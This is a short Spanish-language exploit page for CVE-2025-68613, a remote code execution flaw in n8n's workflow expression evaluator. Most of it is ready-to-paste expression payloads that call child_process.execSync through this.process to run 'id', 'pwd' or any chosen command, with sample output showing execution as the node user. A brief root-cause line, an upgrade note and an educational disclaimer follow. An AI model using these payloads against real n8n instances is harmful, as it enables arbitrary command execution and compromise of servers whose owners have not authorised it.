
CVE-2025-68613: exploit y documentación de la vulnerabilidad RCE de n8n
n8n contiene una vulnerabilidad crítica de Ejecución de Código Arbitrario en su sistema de evaluación de expresiones de flujo de trabajo. Bajo ciertas condiciones, las expresiones proporcionadas por usuarios autenticados durante la configuración del flujo de trabajo pueden ser evaluadas en un contexto de ejecución que no está suficientemente aislado del entorno de ejecución subyacente.
Pega este payload en el campo de expresión:
{{ (function(){ return this.process.mainModule.require('child_process').execSync('id').toString() })() }}

Comando ID:
{{ (function(){ return this.process.mainModule.require('child_process').execSync('id').toString() })() }}
Comando PWD:
{{ (function(){ return this.process.mainModule.require('child_process').execSync('pwd').toString() })() }}
Plantilla de Comando Personalizado:
{{ (function(){ return this.process.mainModule.require('child_process').execSync('COMMAND').toString() })() }}
Para el comando id:
uid=1000(node) gid=1000(node) groups=1000(node)
Para el comando pwd:
/app
El evaluador de expresiones carece de un saneador para evitar que las expresiones de función accedan a this.process (objeto del proceso de Node.js), permitiendo el acceso a módulos del sistema.
Actualiza a n8n v1.122.0 o posterior.
Descargo de responsabilidad: Esta información se proporciona únicamente con fines de sandbox y educativos. El uso no autorizado de esta información para explotar sistemas es ilegal y poco ético. Siempre obtén la autorización adecuada antes de probar o explotar vulnerabilidades.